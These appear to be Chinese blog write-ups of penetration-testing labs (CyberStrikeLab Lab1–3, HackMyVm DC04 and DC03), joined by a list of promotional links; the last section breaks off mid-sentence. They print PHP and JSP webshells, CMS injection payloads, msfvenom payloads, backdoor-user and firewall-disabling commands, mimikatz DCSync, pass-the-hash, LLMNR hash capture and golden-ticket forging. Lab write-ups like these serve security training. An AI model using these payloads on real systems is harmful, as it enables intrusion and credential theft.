【域渗透】cyberstrikelab-lab3 cyberstrikelab-lab3web信息收集端口扫描nmap -sT -Pn -p- 192.168.10.10 -T4 3590端口开启是一个web应用扫描出来了一个访问看看是一个登录框查看登录界面的网页源码登录进来看到版本信息使用万能的搜索引擎看到这里有一个本地文件泄露漏洞找到第一个flag另外还发现能在web目录写入文件，我们写入一句话<?php @eval($_POST['cmd']);?> 蚁剑连接msfvenom -p windows/meterpreter/bind_tcp LHOST=10.10.10.173 LPORT=4444 -f exe -o shell.exe 内网渗透上线msf直接就是系统权限查找fscanfind / -name "fscan.exe" 2>/dev/null 利用meterpreter模块上传upload /data/CS/Cobalt_Strike_4.7/plugin/TaoWu/script/x64/fscan.exe 看到有双网卡fscan扫描另一张网卡，发现192.168.20.20和192.168.20.30靶机，其中30是域控主机使用fscan扫描第一台机器的端口添加路由run post/multi/manage/autoroute 配置代理use auxiliary/server/socks_proxy set VERSION 5 set SRVPORT 1080 run -j 修改代理vi /etc/proxychains4.conf 访问到thinkphp站从flag中可以看到木马在主页使用awBruter密码爆破工具，爆破出来密码是admin123蚁剑设置好代理使用密码连接找到第二个flag拿下系统权限域渗透之后就可以上传msf马，如果蚁剑不行的话（这个环境可能有一点问题，第二台机器老是断网）那就使用windows的远程连接上传到10.10，然后再利用windows自带的远程连接传20.20机器（前提是创建了一个远程连接用户），往期很多文章都写过，之后利用msf抓取hash或者使用猕猴桃抓取哈希，使用hash传递攻击proxychains impacket-psexec -hashes :f349636281150c001081894de72b4e2b cyberstrikelab.com/administrator@192.168.20.30

【域渗透】CyberStrikeLab-Lab2，骑士CMS渗透 web渗透最开始已经获取到了对方的内网ip，192.168.10.10 ，通过fscan扫描内网并探测一定数量的端口，扫描结果先808端口是web服务，通过页面的title显示出这是骑士cms内容管理系统访问这个界面是骑士cms翻到最底下，发现系统版本随便找几篇文章看看有没有pochttps://xz.aliyun.com/news/3368找到一个poc输入poc，自动跳转到登录界面，看来没有未授权登录漏洞http://192.168.10.10:808/index.php?m=Admin&c=Tpl&a=set&tpl_dir= ', 'a',phpinfo(),' 尝试访问呢一个不存在的页面，爆出来了thinkphp的版本使用thinkphp综合利用工具，没有漏洞方案二，爆破后台账号密码爆破出密码为admin123456登录后台再使用poc，能够正常获取php的版本信息http://192.168.10.10:808/index.php?m=Admin&c=Tpl&a=set&tpl_dir= ', 'a',phpinfo(),' 继续执行，创建一个一句话木马http://192.168.10.10:808/index.php?m=Admin&c=Tpl&a=set&tpl_dir= ', 'a',eval($_POST['cmd']),' https://xz.aliyun.com/news/3368，这篇文章已经告诉我们shell的路径在哪了，他会在这个文件里面创建你执行的恶意代码来访问这个界面，正常执行我们刚刚嵌入的恶意代码http://192.168.10.10:808/Application/Home/Conf/config.php 打开蚁剑，输入链接和密码在c盘找到flag使用msf创建一个马msfvenom -p windows/meterpreter/bind_tcp LHOST=10.10.10.173 LPORT=4444 -f exe -o shell.exe 使用蚁剑上传打开msf，开启监听# kali msfconsole use multi/handler set payload windows/meterpreter/bind_tcp set rhost 192.168.10.10 # 蚁剑执行上传成功的木马 shell.exe 内网渗透上线之后，发现是系统权限。进入命令行shell chcp 65001 whoami # 发现是系统权限，不用额外提权 退出会话，将会话保留在后台exit bg 在本机查找fscanfind / -name "fscan*" 2>/dev/null 找到fscan位置后，进入会话1 并上传fscansessions 1 upload /data/CS/Cobalt_Strike_4.7/plugin/TaoWu/script/x64/fscan.exe 在当前目录下找到fscan利用fscan扫内网，发现另外两台主机192.168.10.20和192.168.10.233，20机器的8080端口是web服务访问界面，是一个tomcattomcat文件上传漏洞 https://blog.csdn.net/allintao/article/details/129503762200表示ok，上传成功<%! class U extends ClassLoader { U(ClassLoader c) { super(c); } public Class g(byte[] b) { return super.defineClass(b, 0, b.length); } } public byte[] base64Decode(String str) throws Exception { try { Class clazz = Class.forName("sun.misc.BASE64Decoder"); return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str); } catch (Exception e) { Class clazz = Class.forName("java.util.Base64"); Object decoder = clazz.getMethod("getDecoder").invoke(null); return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str); } } %> <% String cls = request.getParameter("passwd"); if (cls != null) { new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext); } %> 连接测试将之前的生成的马上传上去准备上线msf# msf use multi/handler set payload windows/meterpreter/bind_tcp set rhost 192.168.10.20 # 蚁剑执行上传成功的木马 shell.exe 成功拿下20权限，使用msfgetsystem进行提权，结果显示，成功提权到system权限在根目录找到flag2输入ipconfig，看到另一个网卡地址再上传fscan，这个新的网卡upload /data/CS/Cobalt_Strike_4.7/plugin/TaoWu/script/x64/fscan.exe 发现20.30 机器存在永恒之蓝漏洞再来设置路由，此时你会有两个会话和路由run autoroute -s 192.168.20.0/24 run autoroute -p 域渗透上传mimikatz.exe 抓取系统hash使用find查找find / -name "mimika*.exe" 2>/dev/null 进入shell执行命令.\mimikatz.exe privilege::debug sekurlsa::logonpasswords 抓取到administrator用户的NTML hash0a571981f9373e059c6c6313c2469359 准备好frp配置文件，搭建正向代理，客户端配置服务端配置PTH登录，并且上传frpevil-winrm -i 192.168.10.20 -u Administrator -H "0a571981f9373e059c6c6313c2469359" upload windows_x64_admin.exe 启动# kali ./frpc -c frpc.ini # 靶机 ./frps.exe -c frps.ini 修改代理配置文件vi /etc/proxychains4.conf 使用proxychains代理启动msfproxychains msfconsole 使用永恒之蓝命令执行模块，能够正常执行命令use admin/smb/ms17_010_command set RHOSTS 192.168.20.30 set command whoami run 找到最后一台机器的flagset command type C:\\flag.txt run

【域渗透】CyberStrikeLab-Lab1 1、WEB渗透在网页底部的版权信息区域，发现明确标注 易优 CMS”，从这里可以锁定站点使用的 CMS 系统类型。进一步信息收集，通过百度检索易优 CMS 官方文档，确认该 CMS 系统基于 ThinkPHP5.0 框架开发选用 ThinkPHP 漏洞利用工具，用ALL检测所有漏洞。通过工具检测目标站点存在tp5_index_construct_rce命令执行漏洞。通过 ThinkPHP 漏洞利用工具的 “命令执行模块”，输入基础探测命令whoami（用于查询当前执行用户身份），执行后返回结果为nt authority\system，明确当前已获取系统权限漏洞触发获取的权限是 “临时权限”，一旦漏洞修复、服务重启或网络中断，攻击者将失去对服务器的控制。因此，写入后门的核心目的是建立 “持久化控制通道”，确保后续可随时访问目标服务器，且不易被管理员发现。写入一句话木马，设置木马名称，再点击GetShell，成功的话最后获得一句话木马的地址<?php @eval($_POST['a']);?> 为实现可视化管理，使用蚁剑（一款专门用于管理 Web 后门的工具）进行连接。在蚁剑中输入木马访问地址、通信密码a，点击 “测试连接”，显示 “连接成功”，表明已建立稳定的 Web 管理通道。通过蚁剑可直观查看服务器文件系统、执行命令、上传下载文件，操作便捷且隐蔽性强。解法一：数据库密码泄露/config/database.php，数据库配置文件配置文件中显示数据库用户为root，密码为xxxxxx（已隐藏）。 Windows 默认管理员账号administrator，并复用该数据库密码作为系统登录密码。启用远程桌面连接，需通过蚁剑执行以下命令：# 修改注册表，允许远程登录： reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f # 关闭 Windows 防火墙： netsh advfirewall set allprofiles state off 远程连接，输入目标服务器 IP、账号administrator、密码xxxxxxadministrator ：数据库密码 登录成功，这里登录成功的权限是administrator管理员组而这里蚁剑执行命令的权限是系统权限，权限等级会更高一点，主要利用这一块解法二：添加用户通过蚁剑执行以下命令：# 创建新用户，并设置密码： net user xiaoyu 123@abc /add # 将新用户添加到管理员组： net localgroup Administrators xiaoyu /add 生成正向连接木马：msfvenom -p windows/meterpreter/bind_tcp LHOST=10.10.10.173 LPORT=4444 -f exe -o shell.exe 本次测试中，目标服务器可被攻击者访问，但攻击者主机因处于内网无公网 IP，因此选择正向连接模式。设置正向连接，是我们主动去连接目标主机的4444端口use exploit/multi/handler # 启用监听模块 set payload windows/meterpreter/bind_tcp # 匹配生成木马时的payload set RHOST 192.168.10.10 # 目标服务器IP地址 set RPORT 4444 # 匹配木马中设置的监听端口 run # 启动监听 通过蚁剑将生成的shell.exe文件上传至目标服务器的 Web 根目录（或其他可执行目录），并执行该文件。上传上去了，但是执行没有结果，那是因为我们是正向连接，需要主动去连接靶机的4444端口，而不是等着shell回弹回来，如果还没有回来，请禁用目标防火墙netsh advfirewall set allprofiles state off 命令执行后，MSF 控制台立即反馈 “Meterpreter session 1 opened”，表明已成功建立稳定的 Meterpreter 会话。这里就已经成功上线了2、内网渗透ipconfig，查看目标服务器的内网 IP 段（192.168.20.0/24），并发现内网中存在其他主机选用 fscan 工具，通过 Meterpreter 的upload命令将工具上传至目标服务器：upload /data/CS/Cobalt_Strike_4.7/plugin/TaoWu/script/x64/fscan.exe 执行以下命令启动 fscan 扫描：fscan.exe -h 192.168.20.0/24 # 扫描整个内网网段 扫描结果显示，192.168.20.30 和 192.168.20.20（域控），两台主机均存在 MS17-010 漏洞（永恒之蓝）在内网中，攻击者无法直接访问 192.168.20.30 和 192.168.20.20（仅 192.168.20.10 可与内网其他主机通信）。设置路由的核心目的是将已控制的 192.168.20.10 作为 “跳板机”，让攻击者的流量通过该跳板机进入内网，实现对其他主机的访问。文案路线，你->对方外网机器（10.10）-> 对方内网机器（主机20.30和20.20），而你无法直接通过箭头访问到对方的内网主机，你需要获得对方内网主机10.10的系统权限，然后再代理到这台机器，去打对方的内网主机随后在 Meterpreter 会话中执行以下命令设置路由：# 添加内网路由： run autoroute -s 192.168.20.0/24 # 查看路由表： run autoroute -p 路由添加成功后，尝试利用永恒之蓝漏洞打 192.168.20.30我测试了多个 MS17-010 相关漏洞利用模块，均没有成功，尝试到最后一个执行命令的模块auxiliary/admin/smb/ms17_010_command的时候，可以正常执行命令，就是获取不到Meterpreter后渗透会话，但可以执行命令use auxiliary/admin/smb/ms17_010_command auxiliary/admin/smb/ms17_010_command模块的作用是通过永恒之蓝漏洞执行命令# 加载模块并查看参数： use auxiliary/admin/smb/ms17_010_command # 加载模块 show options # 查看模块所需配置参数 该模块需配置的关键参数包括RHOSTS（目标主机 IP）、COMMAND（待执行的命令）。验证权限：配置目标主机 IP 并执行whoami命令，验证漏洞利用效果：set rhosts 192.168.20.30 set COMMAND whoami run 执行结果返回nt authority\system，表明已通过永恒之蓝漏洞获取 192.168.20.30 的系统权限，为后续操作提供了高权限基础。此时我们可以借助msf17-010命令执行权限维持配置：为建立稳定的远程控制通道，通过该模块执行以下命令，配置 192.168.20.30 的系统参数：set COMMAND 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f' # 修改注册表，强制启用远程桌面服务（RDP）,允许通过远程桌面（3389端口）连接 set COMMAND 'net user xiaoyu 123@abc /add' #创建一个名为 的新用户，密码设置为 123@abc set COMMAND 'net localgroup Administrators xiaoyu /add' #将用户 dfz 添加到本地管理员组（Administrators），获得系统最高权限 set COMMAND 'netsh advfirewall set allprofiles state off' #关闭Windows防火墙 虽然已设置路由，但远程桌面连接等图形化工具无法直接利用 Meterpreter 路由。配置代理的核心目的是让所有攻击者的工具流量（如远程桌面、文件传输）都通过跳板机转发，实现对 192.168.20.30 的直接访问。MSF 开启 SOCKS5 代理：use auxiliary/server/socks5 # 加载SOCKS5代理模块 set SRVHOST 127.0.0.1 # 代理监听地址（本地回环地址） set SRVPORT 1080 # 代理监听端口 run # 启动代理服务 SOCKS5 是一种通用代理协议，支持 TCP/UDP 流量转发，可适配大多数网络工具。打开10.10计算机的远程桌面连接功能，输入刚刚添加的账号和密码登录成功后，在C盘中查找到最后的flag3、域控渗透前面我们利用fscan.exe扫描出来存在永痕之蓝漏洞，但是利用msf执行不了命令，该怎么上传文件呢？我们可以使用windows自带的远程连接，找到本地资源，在本地设备和资源中找到详细信息把驱动器勾选上，还有本地的C盘文件勾选上，共享到远程连接后的服务器中这样目标机器就能访问10这个机器的文件了随后上传nc至20.10机器然后打开远程登录的20靶机，在共享的C盘文件中找到nc，并放到30的机器当中去不过这里我，我们不能使用30的cmd来反弹shell，因为当前登录的用户并不是系统权限，需要用msf的exp来打这里需要执行3次才会执行一次命令，总体来说延迟了3个命令，或者你要敲三个回车，才能执行你的第一个命令，应该是bug，这里已经获取到了系统权限使用msf上传mimikatz通过共享目录将 mimikatz 工具上传至域控服务器。通过 MSF 模块执行 mimikatz，初始执行时显示 “低权限”，无法提取域哈希。执行以下命令提升权限至系统权限：privilege::debug # 启用调试权限 sekurlsa::logonpasswords # 提取登录密码哈希 最终执行 DCSync 命令，提取整个域的所有用户哈希：lsadump::dcsync /domain:cyberstrikelab.com /all #提取整个域的所有账户哈希 执行结果成功提取到域管理员Administrator的 NTLM 哈希：94bd5248e87cb7f2f9b871d40c903927。获取 NTLM 哈希后，采用 “哈希传递攻击”（Pass-the-Hash，PtH）登录域控服务器。使用 impacket 工具集（一款专注于网络协议攻击的工具集）中的psexec模块，执行哈希传递登录：proxychains impacket-psexec -hashes :94bd5248e87cb7f2f9b871d40c903927 cyberstrikelab.com/administrator@192.168.20.20 命令执行后，成功获取域控服务器的 CMD 会话，执行ipconfig等命令验证，确认已完全控制 192.168.20.20 域控服务器。至此，整个渗透测试流程完成。

HackMyVm-DC04：难 14.1 外网打点nmap -sS -p- -T4 192.168.0.103 | grep -E '^[0-9]+/tcp' | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/,$//'nmap -sS -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49680,49710,49765 -T4 192.168.0.103 -A自动重定向到这个域名编辑下面的文件，将ip和域名加入进去# windows C:\Windows\System32\drivers\etc\hostslinux也要，不然扫描不到东西，这里他变成了重定向次数过多，而不是之前的无法访问网站echo "192.168.0.103 soupedecode.local" >> /etc/hosts使用dir进行目录扫描，扫出来一个这个目录dirb http://soupedecode.local还有一个服务器信息http://soupedecode.local/server-info这里有一个服务版本，可以使用searchsploit检索一下（没有发现任何有用的东西）我们一直往下翻，翻到了这个东西继续将这个域名添加到hosts中，就可以访问站点了，是一个登录框14.2 后台爆破打开burp，fuzz sql注入、xss字典，都没有结果，使用相同的账号密码字典爆破也没有结果继续信息收集smbclient -L //192.168.0.103/ -N后续也尝试了各种枚举，也没有东西。。。。。。后边去看了看别人写的，就是这个机子很容易出问题，爆破几次后，后面怎么爆破都是403了最后爆破出来账号密码是 admin:nimda登录成功后会要求你输入ip地址可能是命令执行，但是尝试各种命令执行都失败了，只要和|，&相关的都不行，看来是做了过滤【RCE剖析】从0-1讲解RCE漏洞绕过，Windows与Linux/RCE漏洞绕过方式总结----实战解析14.3 LLMNR那就来试试DC3的LLMNR，我们在这个输入框里输入kali的ip地址responder -I eth0 -wdecho "websvc::soupedecode:e2985b38b501aed2:E5E63AAD4B475A06D1ECE4C7F78A2E60:010100000000000080646EFE3946DC01F711F570D52509F5000000000200080045004B0042004F0001001E00570049004E002D0043003700380051004F0038004100440032003100490004003400570049004E002D0043003700380051004F003800410044003200310049002E0045004B0042004F002E004C004F00430041004C000300140045004B0042004F002E004C004F00430041004C000500140045004B0042004F002E004C004F00430041004C000700080080646EFE3946DC01060004000200000008003000300000000000000000000000004000005C18B02FEAC5263030D32A3F0BCCDD51E0CAD786D3DFBABF65601AC3E74CE55D0A001000000000000000000000000000000000000900240063006900660073002F003100390032002E003100360038002E0030002E003100340038000000000000000000" > hash john hash --wordlist=/usr/share/wordlists/rockyou.txtwebsvc:jordan23密码已过期，应该知道怎么搞了吧14.5 近源攻击！按住esc进入选择用户界面，然后根据步骤一步一步走输入原来的账号密码选择ok，说明你密码输入对了随后就可以修改你的账号密码了14.6 smb信息收集账号密码 websvc:jordan23smbclient -L //192.168.0.103 -U "SOUPEDECODE.LOCAL/websvc%admin123"在c盘找到第一个flagsmbclient //192.168.0.103/C -U "SOUPEDECODE.LOCAL/websvc%admin123"14.7 查询域内SPN关联用户有了域内的账号密码，再来看看SPN，查询域内所有关联了 SPN 的用户，用来获取他们的凭据，没有结果14.8 枚举域内用户SIDpython /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/websvc@192.168.0.103 > users grep "SidTypeUser" /data/demo/users | awk -F '\\\\' '{print $2}' | awk '{print $1}' | sort -u > /data/demo/target_users.txt14.9 获取不需要预认证用户的AS-REP哈希结果没有impacket-GetNPUsers -dc-ip 192.168.0.103 soupedecode.local/ -usersfile target_users.txt > hash cat hash | grep +14.10 ldapdomaindump收集 LDAP 信息，获取域内用户列表、权限分组（如 Domain Admins）、账号状态（启用 / 禁用），锁定高价值目标（如 Administrator）。ldapdomaindump -u "SOUPEDECODE.LOCAL\websvc" -p admin123 192.168.0.103 python -m http.server访问8000端口，看到用户不属于任何特权组，仅仅是普通用户仔细翻翻看，找到一个默认的账号密码rtina979 ：Z~l3JhcV#7Q-1#M同样的密码过期，需要近源攻击！smbclient //192.168.0.103/C$ -U "SOUPEDECODE.LOCAL/rtina979%Z~l3JhcV#7Q-1#M"这里给你们一张表，输入清楚了哈，我输了十多遍，艹14.11 二次smb信息收集此时就能正常登录了在rtina979用户的Documents文件夹里找到一个rar压缩包，把它下载下来解压需要密码fcrackzip 工具只能用于破解 ZIP 文件，而我们的文件是 RAR 格式。使用 rar2john 将 RAR 文件转换为 John the Ripper 可识别的哈希格式。提取哈希：rar2john Report.rar > report_hash.txt使用字典攻击（使用 rockyou.txt）：john --wordlist=/usr/share/wordlists/rockyou.txt report_hash.txt解压，输入密码PASSWORD123解压出来会发现当前目录有一个htm文件是一个渗透测试报告在这个报告最后，能看到krbtgt的hash内容14.12 黄金票据攻击条件： 获取 KRBTGT 账户哈希 - 通过 DCSync 或其他方式 获取域 SID - 通过 LDAP 或 SMB 枚举 知道域名 - 目标域的完整名称 获取到了KRBTGT哈希 先验证一下是否是正确的，红色代表失败，紫色代表hash正确，或者账户禁用，或者密码过期等等0f55cdc40bd8f5814587f7e6b2f85e6f14.12.1 获取域SID域SID为：S-1-5-21-2986980474-46765180-2505414164python /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/rtina979@192.168.0.10314.12.2 同步域时间在平时可能会遇到kali和靶机的时间一直都不同步，怎么使用ntpdate或者其他时间同步工具，就是同步不起来，就需要使用下面第一行的命令了systemctl stop systemd-timesyncd # 停止自动时间同步服务 ntpdate 192.168.0.103 # 强制同步时间14.12.3 生成管理员的黄金票据impacket-ticketer -nthash 0f55cdc40bd8f5814587f7e6b2f85e6f -domain-sid S-1-5-21-2986980474-46765180-2505414164 -domain soupedecode.local administrator14.12.4 导入票据到环境变量export KRB5CCNAME=administrator.ccache14.12.5 使用票据impacket-wmiexec soupedecode.local/administrator@dc01.soupedecode.local -k -target-ip 192.168.0.103至此渗透完成啦14.13 总结DC04 域渗透从外网打点起步，nmap 扫描发现目标开放 80、88、445 等端口，访问 80 端口需配置 hosts 解析域名，目录扫描找到后台登录页。爆破无果后，利用后台 IP 输入框发起 LLMNR 投毒，捕获 websvc 用户哈希并破解密码，通过近源攻击修改过期密码。登录 SMB 获取首个 flag 后，枚举域用户发现 rtina979 账号及密码，再次近源攻击修改密码。登录其 SMB 下载加密压缩包，破解后得到渗透报告，从中提取 krbtgt 用户哈希。获取域 SID 并同步时间后，生成 Administrator 黄金票据，导入环境变量后通过 wmiexec 成功登录域控，获取最高权限，全程依赖凭据获取与票据攻击，突破多重限制完成渗透。往期推荐全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细HackMyVm-DC04 ：简单HackMyVm-DC03 ：简单HackMyVm-DC02 ：简单HackMyVm-DC01 ：简单HackMyVm-TriplAdvisor ：简单HackMyVm-Runas ：简单HackMyVm-Always ：简单HackMyVm-Nessus ：简单HackMyVm-Liar ：简单HackMyVm-Simple ：简单HackMyVm-Simple ：简单HackMyVm-Zero ：简单HackMyVm-OMG ：简单新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 linux 信息收集，提权一键梭哈神器x-waf，一个基于fuzz的waf绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略sql注入中各种waf的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种waf绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

HackMyVm-DC03 ：中等 13.1 外网打点nmap -sS -p- -T4 192.168.215.185 | grep -E '^[0-9]+/tcp' | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/,$//'卧槽什么都没有，这怎么打？nmap -sS -p 53,13487,65005 -T4 192.168.215.185 -A扫错了，哈哈哈哈，靶机重启，原来是我换wifi了再来nmap -sS -p- -T4 192.168.215.25 | grep -E '^[0-9]+/tcp' | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/,$//'nmap -sS -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49668,49672,49685 -T4 192.168.215.25 -A根据上面的dc2靶场进行信息收集一波,ldap协议是开启着的，还有smb协议enum4linux-ng -A 192.168.215.25 -C13.2 尝试使用匿名登录smb匿名连接13.3 kerberos 用户名枚举kerbrute userenum -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames.txt --dc 192.168.215.25charlie administrator wreed11 webserver爆破smbnxc smb 192.168.215.25 -u user -p user13.4 爆破 kerberos 协议kerbrute bruteuser --dc 192.168.215.25 -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames.txt wreed11 kerbrute bruteuser --dc 192.168.215.25 -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames.txt charlie三个用户接失败13.4 LLMNR 投毒攻击13.4.1 具体流程骗取目标设备的账号密码哈希，具体流程如下： 监听局域网内的 LLMNR 请求：用 Responder（你之前用过的工具）等软件，在攻击机上监听局域网内的 LLMNR 广播； 伪造响应欺骗目标：当目标设备（比如域内的员工电脑）发起 LLMNR 请求（如解析 \\共享打印机名）时，攻击机抢先回复：“我就是你要找的设备，我的 IP 是攻击机 IP”； 骗取哈希值：目标设备相信后，会试图用当前登录用户的 “NTLM 哈希” 与攻击机建立连接（比如访问共享文件夹），攻击机就能捕获到这个哈希； 破解哈希或直接用哈希登录：拿到哈希后，可通过 hashcat 破解成明文密码，或直接用 “哈希传递（PTH）” 登录其他设备。 13.4.2 如何用 LLMNR 拿到域内哈希比如你在域渗透中，攻击机和目标域内的员工电脑在同一个网段（192.168.215.0/24）： 在 Kali 上启动 Responder，开启 LLMNR 监听： 员工在电脑上误输入 \\不存在的共享名（比如 \\file-server），DNS 解析失败，触发 LLMNR 广播； Responder 捕获到这个请求，伪装成 file-server 回复员工电脑； 员工电脑用当前登录用户（比如 SOUPEDECODE\charlie）的 NTLM 哈希，尝试与攻击机建立 SMB 连接； Responder 成功捕获到 charlie 的哈希，你后续就可以用这个哈希进行 PTH 攻击，登录其他域内设备。 responder -I eth0 -wd这里应该是域控靶机的计划任务，所以能拿到hash拿到这个账号的hash，准备去爆破[SMB] NTLMv2-SSP Client : 240a:42c2:802:3c85:e8b7:3202:ffea:f6fd [SMB] NTLMv2-SSP Username : SOUPEDECODE\DC01$ [SMB] NTLMv2-SSP Hash : DC01$::SOUPEDECODE:b7c95f1435ed324f:38D48E36709F60B6B02218D61D394294:010100000000000000A791D28545DC0159ED6A549FAD342D0000000002000800330037005300330001001E00570049004E002D005500350050004500330055004F00300044004600550004003400570049004E002D005500350050004500330055004F0030004400460055002E0033003700530033002E004C004F00430041004C000300140033003700530033002E004C004F00430041004C000500140033003700530033002E004C004F00430041004C000700080000A791D28545DC010600040002000000080030003000000000000000000000000040000033BE778EBDE22DAB53FA856B26B3A1EABC23AFB04656C990D86DF46D0504C4230A0010000000000000000000000000000000000009002C0063006900660073002F0053004F005500500045004400450043004F00440045002E004C004F00430041004C000000000000000000 --- [SMB] NTLMv2-SSP Client : 240a:42c2:802:3c85:e8b7:3202:ffea:f6fd [SMB] NTLMv2-SSP Username : soupedecode\xkate578 [SMB] NTLMv2-SSP Hash : xkate578::soupedecode:0215e15662d218c6:75CB92B3BD84CC2BA33FD7549A0D1EA4:010100000000000000A791D28545DC018EC3298268DA333B0000000002000800330037005300330001001E00570049004E002D005500350050004500330055004F00300044004600550004003400570049004E002D005500350050004500330055004F0030004400460055002E0033003700530033002E004C004F00430041004C000300140033003700530033002E004C004F00430041004C000500140033003700530033002E004C004F00430041004C000700080000A791D28545DC010600040002000000080030003000000000000000000000000040000033BE778EBDE22DAB53FA856B26B3A1EABC23AFB04656C990D86DF46D0504C4230A0010000000000000000000000000000000000009001E0063006900660073002F00460069006C006500530065007200760065007200000000000000000013.5 smb渗透找到账号密码，查看smb服务器内有什么东西xkate578:jesuschrist smbclient -L //192.168.215.25/ -U xkate578登录到share共享文件夹，发现user.txt尝试上传，发现这个用户有上传文件的权限使用evil-winrm连接失败evil-winrm -i 192.168.215.25 -u xkate578 -p jesuschrist13.6 查询域内SPN关联用户查询寻域内所有关联了SPN的用户（用于发现这些用户的TGS票据，从而破解密码）13.7 枚举域内用户SIDxkate578这个用户有查看域内SID信息的权限python /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/xkate578@192.168.215.25 > results.txt把这些用户名信息导出为一个用户字典grep "SidTypeUser" /data/demo/results.txt | awk -F '\\\\' '{print $2}' | awk '{print $1}' | sort -u > /data/demo/target_users.txt13.8 爆破 kerberos针对域用户 xkate578 进行 “密码暴力破解” 的操作，核心目的是通过字典攻击尝试获取该用户的明文密码。ntpdate 192.168.215.25 kerbrute bruteuser --dc 192.168.215.25 -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames-dup.txt xkate578 -v13.9 nxc爆破smb使用nxc内网渗透神器，使用相同的账号密码爆破smb服务器，全部失败13.10 获取不需要预认证用户的AS-REP哈希全部没有impacket-GetNPUsers -dc-ip 192.168.215.25 soupedecode.local/ -usersfile target_users.txt利用之前得到的密码 xkate578:jesuschristldapsearch -x -H ldap://192.168.215.25 -D "xkate578@SOUPEDECODE.LOCAL" -w 'jesuschrist' -b 'DC=SOUPEDECODE,DC=LOCAL' "sAMAccountName=xkate578" memberOf > ldap_result.txt 参数 作用 -x 使用简单认证（非 SASL 认证），适合用用户名 / 密码登录。 -H ldap://192.168.215.25 指定 LDAP 服务器地址（这里是域控的 IP）。 -D "xkate578@SOUPEDECODE.LOCAL" 绑定的用户 DN（用户名），即使用 xkate578 的凭证登录 LDAP。 -w 'jesuschrist' 绑定用户的密码（xkate578 的密码）。 -b 'DC=SOUPEDECODE,DC=LOCAL' 查询的基准 DN（域的根目录），即从整个域范围查询。 "sAMAccountName=xkate578" 过滤条件：只查询 sAMAccountName 为 xkate578 的用户（精准定位自身）。 memberOf 只返回该用户的 memberOf 字段（即所属的组）。 > ldap_result.txt 将结果输出到文件，方便查看。 从结果中可以看到这个用户属于Account Operators 组作用： 创建 / 修改 / 删除普通域用户账号可在域内新增用户（如 testuser）、修改现有用户的属性（如密码、登录脚本、所属组等），但不能修改域管理员（Domain Admins）等高级账号。 管理用户组（非特权组）可创建新的普通用户组，或修改普通组的成员（如将 zximena448 加入某个组），但不能修改 Domain Admins、Enterprise Admins 等特权组。 重置普通用户密码可强制重置普通域用户的密码（无需知道原密码），例如将 zximena448 的密码改为 hacked123，进而控制该账号。 查看域内用户 / 组的详细信息比普通用户拥有更高的 LDAP 查询权限，可获取更多域内账号的属性（如密码过期时间、登录次数等）。 尝试利用net命令和这些凭证，向目标域添加一个用户，然后使用evil-winrm连接的时候，连接不上net rpc user add "it_support" "ItSupport@123" -U "SOUPEDECODE.LOCAL/xkate578%jesuschrist" -S 192.168.215.25 evil-winrm -i 192.168.215.25 -u it_support -p 'ItSupport@123'将用户添加到远程管理组即可使用evil-winrm连接net rpc group addmem "Remote Management Users" it_support -U "SOUPEDECODE.LOCAL/xkate578%jesuschrist" -S 192.168.215.25 evil-winrm -i 192.168.215.25 -u it_support -p 'ItSupport@123'那么尝试添加管理员组呢？很明显，之前已经说过了，Account Operators组的用户，可创建新的普通用户组，或修改普通组的成员（如将 zximena448 加入某个组），但不能修改 Domain Admins、Enterprise Admins 